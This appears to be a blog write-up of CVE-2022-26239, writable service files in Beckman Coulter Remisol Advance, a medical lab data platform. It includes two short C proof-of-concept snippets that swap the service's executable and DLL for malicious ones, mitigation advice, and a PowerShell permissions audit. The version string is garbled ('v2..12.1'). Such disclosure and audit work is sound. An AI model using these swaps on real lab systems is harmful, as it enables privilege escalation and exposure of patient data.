CVE-2022-26239 - Unprivileged User Access to Executables and Libraries in Beckman Coulter Remisol Advance v2..12.1 and Prior

Remote attackers can exploit a critical vulnerability in the Beckman Coulter Remisol Advance v2..12.1 and previous versions. The vulnerability is assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2022-26239. The Normand License Manager, which is part of the software package, has improper default permissions. This issue allows unprivileged users to overwrite and manipulate executables and libraries on the system, gaining access to sensitive data. In this blog post, we will delve into the details of this vulnerability and the potential exploit opportunities it provides to attackers.

Background on Remisol Advance

Beckman Coulter Remisol Advance is a software platform developed for labs to streamline the management and control of information generated by medical instruments. It consolidates data generated by the lab instruments and displays it in real-time, helping institutions improve their decision-making, reporting, and regulatory compliance. The platform provides comprehensive tools for data management and workflow automation, making it a popular choice among healthcare organizations.

Description of CVE-2022-26239

The Normand License Manager, a running service in Remisol Advance, suffers from misconfigured default permissions. This allows unprivileged users to overwrite and manipulate executables and libraries. Attackers can exploit this vulnerability to access sensitive data and control the entire system, leading to unauthorized access or even complete compromise.

Overwriting Executables

The service runs with excessive permissions, and attackers can replace the original executable file of the Normand License Manager with a malicious one. Once the service restarts, the rogue executable will launch instead of the legitimate one, resulting in unauthorized and potentially damaging consequences. Below is a sample code snippet to overwrite the executable file with a malicious one:

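#include <stdio.h>
#include <stdlib.h>

int main(void) {
    /* Replace the service executable. This succeeds only because the default
       permissions on the install folder let unprivileged users write to it.
       The destination is quoted because the path contains spaces. */
    system("copy /Y malicious.exe \"C:\\Program Files\\Remisol Advance\\Normand License Manager\\original.exe\"");
    return 0;
}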

Manipulating Libraries

Attackers can also exploit the vulnerability by injecting malicious code into shared libraries. When the service loads the compromised library, the attacker's code runs with elevated privileges, providing them unauthorized access to system resources. Here's a sample C code snippet to achieve this:

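#include <stdio.h>
#include <stdlib.h>

int main(void) {
    /* Replace a library that the service loads. As with the executable, this
       depends on the install folder being writable by unprivileged users.
       The destination is quoted because the path contains spaces. */
    system("copy /Y malicious.dll \"C:\\Program Files\\Remisol Advance\\Normand License Manager\\original.dll\"");
    return 0;
}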

Mitigation

Beckman Coulter has acknowledged the vulnerability and released a patch as part of their security update. All users running Remisol Advance are strongly advised to update their systems to the latest version. It is also crucial to review the permissions on all services and executables to avoid similar vulnerabilities in the future.
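
The permissions review recommended above can be scripted. The following PowerShell audit is an added example, not code from the original post or from Beckman Coulter; it checks every installed Windows service rather than only the Normand License Manager, and the list of SIDs treated as unprivileged is an assumption.

```powershell
# Added example, not vendor code: report service binaries, their folders and
# neighbouring DLLs that unprivileged principals are allowed to modify.
# Assumption: these well-known SIDs are the principals treated as unprivileged.
$lowPriv = @{
    'S-1-1-0'      = 'Everyone'
    'S-1-5-11'     = 'Authenticated Users'
    'S-1-5-4'      = 'INTERACTIVE'
    'S-1-5-32-545' = 'BUILTIN\Users'
}
# Rights that allow replacing a file or planting one in a folder, plus the
# unmapped GENERIC_ALL (0x10000000) and GENERIC_WRITE (0x40000000) bits.
$risky = [System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, Delete, ChangePermissions, TakeOwnership'
$riskyMask = [int]$risky -bor 0x10000000 -bor 0x40000000

function Get-ImagePath([string]$PathName) {
    # Win32_Service.PathName is a command line: quoted path, or bare path plus args.
    if ($PathName -match '^\s*"([^"]+)"')        { return $Matches[1] }
    if ($PathName -match '^\s*(.+?\.exe)(\s|$)') { return $Matches[1] }
}

function Get-WeakAce([string]$Path, [string]$Service) {
    $acl = Get-Acl -LiteralPath $Path -ErrorAction SilentlyContinue
    if (-not $acl) { return }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if (([int]$ace.FileSystemRights -band $riskyMask) -eq 0) { continue }
        try   { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value }
        catch { continue }   # identity could not be resolved to a SID
        if ($lowPriv.ContainsKey($sid)) {
            [pscustomobject]@{ Service = $Service; Path = $Path
                               Principal = $lowPriv[$sid]; Rights = $ace.FileSystemRights }
        }
    }
}

$seen = @{}   # each path is checked once, under the first service that uses it
Get-CimInstance Win32_Service | ForEach-Object {
    $exe = Get-ImagePath $_.PathName
    if (-not $exe -or -not (Test-Path -LiteralPath $exe -PathType Leaf)) { return }
    $dir = [System.IO.Path]::GetDirectoryName($exe)
    $dlls = @(Get-ChildItem -LiteralPath $dir -Filter *.dll -File | ForEach-Object FullName)
    foreach ($target in @($exe, $dir) + $dlls) {
        if ($seen.ContainsKey($target)) { continue }
        $seen[$target] = $true
        Get-WeakAce -Path $target -Service $_.Name
    }
} | Format-Table -AutoSize
```

Each row in the output is a path tied to a service that a non-administrative principal can modify. Inherit-only entries on a folder are reported as well, since they apply to files created inside it.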

CVE Details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26239
NVD: https://nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26239

Conclusion

In conclusion, the CVE-2022-26239 vulnerability affects the Beckman Coulter Remisol Advance v2..12.1 and prior versions. It allows unprivileged users to overwrite and manipulate executables and libraries, primarily due to the improper configuration of default permissions for the running service Normand License Manager. Users must update their systems to the latest Remisol Advance version and closely review service and executable permissions to mitigate this issue and avoid future vulnerabilities.

Timeline

Published on: 10/06/2022 18:15:00 UTC
Last modified on: 10/10/2022 03:00:00 UTC